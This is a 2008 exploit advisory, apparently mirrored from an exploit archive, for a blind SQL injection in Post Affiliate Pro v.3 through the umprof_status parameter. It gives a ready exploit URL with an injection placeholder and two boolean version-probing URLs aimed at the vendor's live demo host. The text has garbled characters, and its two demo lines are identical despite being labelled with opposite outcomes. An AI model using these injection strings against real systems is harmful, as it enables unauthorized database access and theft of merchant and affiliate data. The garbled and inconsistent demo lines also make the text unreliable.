[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Post Affiliate Pro v.3 (umprof_status) Blind SQL Injection Vulnerability
# Published : 2008-11-26
# Author : XaDoS
# Previous Title : CMS Ortus <= 1.13 Remote SQL Injection Vulnerability
# Next Title : ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability


[a–?]  Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection

 
>??<

> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> B?§g: Blind $ql inJection
> SIte vuln: http://www.qualityunit.com/postaffiliatepro/

>??<
 
 
[a–?] ExPL0iT:
 
|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] 
 
 [you must be merchants]

[a–?] D?£M0: 
 
|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO?°?°]
 
|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] 
 

 
[a–?] Th4nKs::
 
> Str0ke </
> Joy Division </
> Teo Babbeo </
> Spud </
> Loooo Z00ooo00oo0 </  Lol ;-)

# www.Syue.com [2008-11-26]